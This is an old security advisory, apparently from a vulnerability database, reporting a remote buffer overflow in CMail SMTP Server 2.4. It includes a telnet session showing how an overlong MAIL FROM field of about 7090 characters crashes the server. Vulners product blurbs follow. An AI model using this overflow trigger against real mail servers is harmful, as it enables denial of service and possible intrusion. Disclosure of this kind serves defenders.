`CMail SMTP Server
Version 2.4:
Remotely exploitable buffer overflow
CMail SMTP Server Version 2.4 Problem: We found a buffer overflow in
the CMail SMTP service (long MAIL FROM:) that may allow an attacker to
execute arbitrary code on the target server, it is based on the eEye
pointed out overflows in cmail 2.3 >:-] Which was never fixed...
software vendors still not taking security issues seriously.
Example:
[cham@guilt cham]$ telnet example.com 25 Trying
example.com...
Connected to example.com. Escape character is '^]'.
220 SMTP services ready. Computalynx CMail Server Version: 2.4
helo ussr
250 Hello ussr [yourip], how are you today?
MAIL FROM: cmail<[buffer]@cmaildotcom.com>
Where [buffer] is aprox. 7090 characters.
At his point the server overflows and crashes.
Just a typical buffer overflow that should
have been fixed in version 2.3 when it was pointed out to them.
Luck Martins
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
WWW.USSRBACK.COM
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation